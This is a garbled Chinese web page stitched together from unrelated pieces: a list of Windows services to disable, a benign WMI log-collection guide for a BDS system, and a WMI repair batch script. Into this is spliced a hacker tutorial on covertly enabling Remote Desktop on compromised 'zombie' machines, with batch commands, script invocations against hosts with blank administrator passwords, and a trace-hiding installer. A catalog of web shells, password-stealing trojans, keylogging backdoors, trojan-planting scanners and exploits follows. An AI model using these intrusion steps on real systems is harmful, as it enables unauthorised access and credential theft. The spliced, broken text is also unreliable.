Windows中的哪些服务可以关闭？

alerter -错误警报器，垃圾

application layer gateway service -给与第三者网络共享/防火墙支持的服务，有些防火墙/网络共享软件需要。占用 1。5mb内存。

application management-用于设定，发布和删除软件服务。

automatic updates -windows自动更新，靠，滚！

background intelligent transfer service -这个服务原是用来实现>1怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用:
1，打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysocinf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots105
使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscriptexe调用脚本，例如：
c:\>cscript ROTSvbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器，IP地址是222222222222，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript regvbe 222222222222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript regvbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222222222222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）
脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。
如果要对本地使用，IP地址为127001或者一个点（用表示），用户名和密码都为空（用""表示）。
脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。
3，下载3389自动安装程序-djshao正式版50
说明：
解压djshao50zip,用你的随便什么方法把把解压出来的djxyxsexe上传到肉鸡的c:\winnt\temp下，然后进入c:\winnt\temp目录执行djxyxsexe解压缩文件，然后再执行解压缩出来的azzdexe文件，等一会肉鸡会自动重启！重启后会出现终端服务！
特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！
4，下载DameWare NT Utilities 36600 注册版
安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK
5运用远程开启3389软件开启(需要有对方机子的管理员帐号和密码)
6在自己机上安装一个20cn的ftp服务器,在对方的dos下将本机的3389开启工具下载到对方机子,然后执行
2CGI后门：
cgi网页后门 cgi网页后门，envymask编写《
网页合并器 本程序可以自动生成网页，可以把网页和EXE合成新的网页，在打开网页的同时自动运行EXE文件你将木马合并在一个网页中，别人浏览之后，呵呵，我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马，因为它是用asp做的，也是一套asp在线极好的网页编辑软件，支持在线更改、编辑、删除任意文本文件，同时最重要的是解决了无组件asp上传（中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门，涵盖jsp,php,asp,cgi等等)
命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件，主程序是一个仅仅5k左右的可执行文件，可完全独立执行而不依赖于任何系统动态连接库，尽管它体积小小，却功能不凡，支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时，将用户登陆的名字，登陆密码等记录到文件中去，因为这个DLL是在登陆时加载，所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户儒
Wollf15 我们的一位女黑客写的软件，扩展Telnet服务，集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 150最终版在 一个扩展型的telnet后门程序{中国最强的后门}

菜鸟扫描软件！
20CN IPC 扫描器正式版
全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户（中文版）
网络肉鸡猎手
一个快速查找网络肉鸡的小工具
网页信息神探 使得网页不再有秘密，各种信息一目了然，什么、、Email地址、文章、Flash、压缩文件、可执行文件等等的链接地址无处可藏！连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、、写真

SQL2exe SQL蠕重听过吧，就是的这个漏洞！
NetScanTools 一款功能强大的网络工具包（英文版）
dvbbsexe
动网logoutasp利用程序
THCsql
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序，内含源代码。
小紫V20追加版
小紫（LB论坛噩梦）V20追加版加入LBEXE，可以获得论坛管理员权限。
LB5论坛轰炸机
我兄弟写的程序，{推存}
LB5论坛轰炸机修正版25在LB5论坛轰炸机修正版20的原有功能基础上增加以下功能及特性：1同时支持6线程轰炸，速度可比V20提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改（
MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机（其实不局限于MSN 的），它具有超快的攻击速度，据测试，在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小，有效节省系统资源（
怪狗专用版3389登陆器 我改的一个小程序，有用户名密码，用它可以3389登陆win系统，（必备）
DameWare NT Utilities
一款功能强大的Windows NT/2000/XP 服务器远程控制软件，只要拥有一个远程主机的管理帐号，就能使用它远程GUI下登陆交互控制主机（英文版）《
追捕： 找到IP所在地！
柳叶擦眼
这个小软件可以列出系统所有的进程（包括隐藏的），并可以杀死进程这个是共享软件（中文版）《让传奇木马走开》
Xdebug ey4s大哥写的windows 2000 kernel exploit，有了它提升权限就简单了！
代理之狐 可得到最新代理，用于隐藏真实IP，不过，有能力最好自己在肉机上做个代理安全！
HackerDicBuilder 本软件属于一款字典制作工具，根据国人设置密码的习惯,利用线程技术，生成字典文件 （中文版） 多位朋友点播
scanipc 这个是木头见过的最傻瓜化的入侵软件了，只要设置好你要上传的后门和IP范围，它就会开始工作了，界面简单实用，全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户
Tiny Honeypot 这是一款简单的蜜罐程序，主要基于iptables的重定向和一个xinetd监听程序，它监听当前没有使用的每个TCP端口记录所有的活动信息，并且提供一些回送信息给入

一、场景：

BDS系统上需要识别1台windows 10主机的日志，进行标准化呈现：

win10主机的ip地址：1921681174 

二、注意事项

网络通信正常：被采集设备与日志服务器之间网络可达，用于WMI访问的135端口畅通（例如没有被硬件防火墙阻断135端口）；

被采集服务器自带防火墙允许WMI应用通过windows防火墙进行通信,如下图

使用WMI方式进行日志收集。WMI为针对Windows系列设备的专用接入方式，适用于Windows2003、2008、2012系统。注意事项如下：

1、确认设备的WMI服务处于运行状态；

2、bds上需要录入具有WMI权限的账号进行日志采集： 

（1）可以使用administrator账号进行采集,administrator带有WMI权限，仅需要开启WMI服务即可（参考下文 三、windows配置WMI，允许BDS采集日志第1步）

（2）如果用户由于涉密无法提供administrator账号，可以通过创建具有WMI权限的账号进行日志采集；

3、本文以创建具有WMI权限的wmitest账号为例，采集windows主机审核日志。

三、windows配置WMI，允许BDS采集日志

1、确保设备的WMI服务处于运行状态

在运行对话框输入servicesmsc

确保WMI服务处于"正在运行"的状态，如未处于"正常运行"，右键点击该服务，选择"启动"

如果用户可以提供adminstrator账号，则直接就可以在bds系统上进行日志标准化配置 *** 作；

      如果用户由于涉密无法提供administrator账号，下文以创建具有WMI权限的wmitest账号为例

2、创建账号wmitest账号，并赋予wmi权限

（1）在运行对话框中输入lusrmgrmsc,创建账号wmitest

在d出的窗口中，右键点击"用户"，选择新用户

设置账号wmitest，设定密码，同时勾选用户不能修改密码、密码永不过期两个选项

(2)给wmitest用户WMI授权

控制面板->管理工具->计算机管理->服务和应用:右键WMI控件属性->安全标签安全设置->为用户添加所有权限

      （3）组件服务-计算机属性-com安全-启动激活权限

（4）打开本地安全策略

控制面板>管理工具>本地安全策略>本地策略>审核策略，根据实际需要开启相关策略。

（5）最后赋予wmi账号"管理审核和安全日志"权限

四、BDS系统配置：日志标准化配置

点击"采集管理"->"采集器管理"->"新增"，新增采集器，如下图所示

按照下图进行设置，设置完毕后点击接入设备列表处的"新增"按钮

名称：自定义

类型：选择事件采集器

接入方式：WMI

标准化策略：选择Microsoft Windows(输入首几位字母，系统将自动检索)

输入目标主机的信息，包括ip地址、账号（具有wmi权限）、密码等，点击"检测"

如通信正常，主机将提示检测成功，如下图；

检测通过后点击确认，完成windows主机添加

     注意：添加多台windows有两种方式

方式1：编辑原有的采集器策略进行添加

方式2：新增采集器进行添加

      两种方式的区别在于：方式1添加较为便利，方式2多采集器处理性能更高；建议使用方式2进行添加；当每台windows主机日志量较小时可以使用方式1

五、标准化日志查看

点击"事件分析"->"事件列表"界面，可以显示已添加设备的日志收集情况（按严重、高级、中级、低级、信息）显示

注意：

日志按照原始设备日志等级，以严重、高级、中级、低级、信息级别显示；如果原始设备部携带日志等级信息，系统将按照默认的显示等级显示。

设备名称：设备在"资产管理"->"资产管理"中完成相应资产设置的，在此处将显示具体信息。如果没有则留白不显示；

点击具体设备，可以显示设备当日具体日志信息，点击某一条日志，将显示具体的日志信息

方法一：最简单的,运行命令行吧windows提供了sc服务控制台命令，具体打开cmd键入"sc /"查看帮助信息 例如停止WMI服务;Windows Management Instrumentationsc stop winmgmt启动WMI服务sc start winmgmt枚举WMI服务的信息sc query winmgmt设置WMI服务的启动类型为禁用sc config winmgmt start= disabled 方法二：用CMD的我会一些，CMD可以搞定 版本 2运行 (“cmd /c net start ” ＋ #引号 ＋ “COM+ Event System” ＋ #引号, 假, ) ' COM+ Event System 就是要开启的服务，可以改成别的 运行 (“cmd /c net stop ” ＋ #引号 ＋ “COM+ Event System” ＋ #引号, 假, ) ' COM+ Event System 就是要关闭的服务，可以改成别的

建议用心蓝wmi服务修复工具。或者系统没有WMI服务，或网路适配器共享时提示WMI错误等均可使用。使用方法以下方法：复制并保存为wmibat@echo oncd /d c:\tempif not exist %windir%\system32\wbem goto TryInstallcd /d %windir%\system32\wbemnet stop winmgmtwinmgmt /killif exist Rep_bak rd Rep_bak /s /qrename Repository Rep_bakfor %%i in (dll) do RegSvr32 -s %%ifor %%i in (exe) do call :FixSrv %%ifor %%i in (mof,mfl) do Mofcomp %%inet start winmgmtgoto End:FixSrvif /I (%1) == (wbemcntlexe) goto SkipSrvif /I (%1) == (wbemtestexe) goto SkipSrvif /I (%1) == (mofcompexe) goto SkipSrv%1 /RegServer:SkipSrvgoto End:TryInstallif not exist wmicoreexe goto Endwmicore /snet start winmgmt:End

---